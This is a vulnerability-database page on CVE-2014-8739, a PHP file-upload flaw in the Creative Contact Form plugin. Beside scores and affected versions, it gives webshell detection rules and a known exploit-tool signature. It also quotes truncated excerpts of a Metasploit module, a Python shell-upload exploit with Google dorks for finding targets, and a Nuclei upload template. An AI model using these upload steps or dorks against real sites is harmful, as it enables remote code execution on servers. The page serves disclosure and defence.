CVE-2014-8739
published 2020-02-08CVE-2014-8739: Unrestricted file upload vulnerability in server/php/UploadHandler.php in the jQuery File Upload Plugin 6.4.4 for jQuery, as used in the Creative Solutions…
PriorityP194critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
91.66%
99.8th percentile
Unrestricted file upload vulnerability in server/php/UploadHandler.php in the jQuery File Upload Plugin 6.4.4 for jQuery, as used in the Creative Solutions Creative Contact Form (formerly Sexy Contact Form) before 1.0.0 for WordPress and before 2.0.1 for Joomla!, allows remote attackers to execute arbitrary code by uploading a PHP file with an PHP extension, then accessing it via a direct request to the file in files/, as exploited in the wild in October 2014.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| creative-solutions | creative_contact_form | < 1.0.0 | 1.0.0 |
| creative-solutions | creative_contact_form | < 2.0.1 | 2.0.1 |
| jquery_file_upload_project | jquery_file_upload | — | — |
Detection & IOCsextracted from sources · hover to see the quote
path/wp-content/plugins/sexy-contact-form/includes/fileupload/files/
bytes↗
----------lImIt_of_THE_fIle_eW_$
- →Detect POST requests to the WordPress plugin upload endpoint with a PHP file in the multipart filename field (files[]) ↗
- →Alert on HTTP 200 responses from the upload endpoint whose body contains both 'files' and 'delete_url', indicating successful PHP shell upload
- →Monitor for direct GET requests to .php files under the plugin's files/ directory, indicating webshell execution after upload ↗
- →Flag multipart upload requests using the distinctive boundary string '----------lImIt_of_THE_fIle_eW_$' as a known exploit tool signature ↗
- →Check plugin readme for version below 1.0.0 on WordPress to confirm vulnerable Creative Contact Form installation ↗
- ·The vulnerability was actively exploited in the wild in October 2014; patched versions are Creative Contact Form >= 1.0.0 (WordPress) and >= 2.0.1 (Joomla!) ↗
- ·The upload handler does not restrict PHP file extensions, meaning any .php file submitted via the files[] field is stored and directly executable under the files/ directory ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
jQuery File Upload Plugin Unrestricted file upload vulnerability
osv·2022-05-17
CVE-2014-8739 [HIGH] jQuery File Upload Plugin Unrestricted file upload vulnerability
jQuery File Upload Plugin Unrestricted file upload vulnerability
Unrestricted file upload vulnerability in `server/php/UploadHandler.php` in the jQuery File Upload Plugin 6.4.4 for jQuery, as used in the Creative Solutions Creative Contact Form (formerly Sexy Contact Form) before 1.0.0 for WordPress and before 2.0.1 for Joomla!, allows remote attackers to execute arbitrary code by uploading a PHP file with an PHP extension, then accessing it via a direct request to the file in `files/`, as exploited in the wild in October 2014.
GHSA
jQuery File Upload Plugin Unrestricted file upload vulnerability
ghsa·2022-05-17
CVE-2014-8739 [HIGH] CWE-434 jQuery File Upload Plugin Unrestricted file upload vulnerability
jQuery File Upload Plugin Unrestricted file upload vulnerability
Unrestricted file upload vulnerability in `server/php/UploadHandler.php` in the jQuery File Upload Plugin 6.4.4 for jQuery, as used in the Creative Solutions Creative Contact Form (formerly Sexy Contact Form) before 1.0.0 for WordPress and before 2.0.1 for Joomla!, allows remote attackers to execute arbitrary code by uploading a PHP file with an PHP extension, then accessing it via a direct request to the file in `files/`, as exploited in the wild in October 2014.
VulnCheck
creative-solutions creative_contact_form Unrestricted Upload of File with Dangerous Type
vulncheck·2014·CVSS 9.8
CVE-2014-8739 [CRITICAL] creative-solutions creative_contact_form Unrestricted Upload of File with Dangerous Type
creative-solutions creative_contact_form Unrestricted Upload of File with Dangerous Type
Unrestricted file upload vulnerability in server/php/UploadHandler.php in the jQuery File Upload Plugin 6.4.4 for jQuery, as used in the Creative Solutions Creative Contact Form (formerly Sexy Contact Form) before 1.0.0 for WordPress and before 2.0.1 for Joomla!, allows remote attackers to execute arbitrary code by uploading a PHP file with an PHP extension, then accessing it via a direct request to the file in files/, as exploited in the wild in October 2014.
Affected: creative-solutions creative_contact_form
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://nv
No detection rules found.
Exploit-DB
WordPress Plugin Creative Contact Form - Arbitrary File Upload (Metasploit)
exploitdb·2015-04-21
CVE-2014-8739 WordPress Plugin Creative Contact Form - Arbitrary File Upload (Metasploit)
WordPress Plugin Creative Contact Form - Arbitrary File Upload (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'Wordpress Creative Contact Form Upload Vulnerability',
'Description' => %q{
This module exploits an arbitrary PHP code upload in the WordPress Creative Contact
Form version 0.9.7. The vulnerability allows for arbitrary file upload and remote code execution.
},
'Author' =>
[
'Gianni Angelozzi', # Vulnerability discovery
'Roberto Soares Espreto ' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['EDB', '35057'],
['OSVDB', '113669'],
['WPVDB', '7652']
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Ta
Exploit-DB
WordPress Plugin 0.9.7 / Joomla! Component 2.0.0 Creative Contact Form - Arbitrary File Upload
exploitdb·2014-10-25
CVE-2014-8739 WordPress Plugin 0.9.7 / Joomla! Component 2.0.0 Creative Contact Form - Arbitrary File Upload
WordPress Plugin 0.9.7 / Joomla! Component 2.0.0 Creative Contact Form - Arbitrary File Upload
---
#!/usr/bin/python
#
# Exploit Name: Wordpress and Joomla Creative Contact Form Shell Upload Vulnerability
# Wordpress plugin version: <= 0.9.7
# Joomla extension version: <= 2.0.0
#
# Vulnerability discovered by Gianni Angelozzi
#
# Exploit written by Claudio Viviani
#
# Dork google wordpress: inurl:inurl:sexy-contact-form
# Dork google joomla : inurl:com_creativecontactform
#
# Tested on BackBox 3.x
#
# http connection
import urllib, urllib2, sys, mimetypes
# Args management
import optparse
# file management
import os, os.path
# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return
Nuclei
WordPress Sexy Contact Form (<= 0.9.7) - Arbitrary File Upload
nuclei·CVSS 9.8
CVE-2014-8739 [CRITICAL] WordPress Sexy Contact Form (<= 0.9.7) - Arbitrary File Upload
WordPress Sexy Contact Form (
------WebKitFormBoundary7MA4YWxkTrZu0gW--
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "files","delete_url")'
- 'contains(content_type, "text/plain")'
condition: and
internal: true
- raw:
- |
GET /wp-content/plugins/sexy-contact-form/includes/fileupload/files/{{fname}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
words:
- "{{marker}}"
# digest: 4a0a00473045022061fd30b9aef3122e547abfd9d23f5c5495e7db05ce19dd04f6c59c4f06263ff202210083e715ff0053464d8e79e1fcf5b0cb50ba58b6e707df512912432f3b9349089a:922c64590222798bb761d5b6d8e72950
Metasploit
Wordpress Creative Contact Form Upload Vulnerability
metasploit
Wordpress Creative Contact Form Upload Vulnerability
Wordpress Creative Contact Form Upload Vulnerability
This module exploits an arbitrary PHP code upload in the WordPress Creative Contact Form version 0.9.7. The vulnerability allows for arbitrary file upload and remote code execution.
No writeups or analysis indexed.
http://osvdb.org/show/osvdb/113669http://osvdb.org/show/osvdb/113673http://www.openwall.com/lists/oss-security/2014/11/11/4http://www.openwall.com/lists/oss-security/2014/11/11/5http://www.openwall.com/lists/oss-security/2014/11/13/3https://wordpress.org/plugins/sexy-contact-form/changelog/https://www.exploit-db.com/exploits/35057/https://www.exploit-db.com/exploits/36811/http://osvdb.org/show/osvdb/113669http://osvdb.org/show/osvdb/113673http://www.openwall.com/lists/oss-security/2014/11/11/4http://www.openwall.com/lists/oss-security/2014/11/11/5http://www.openwall.com/lists/oss-security/2014/11/13/3https://wordpress.org/plugins/sexy-contact-form/changelog/https://www.exploit-db.com/exploits/35057/https://www.exploit-db.com/exploits/36811/
2020-02-08
Published
Exploited in the wild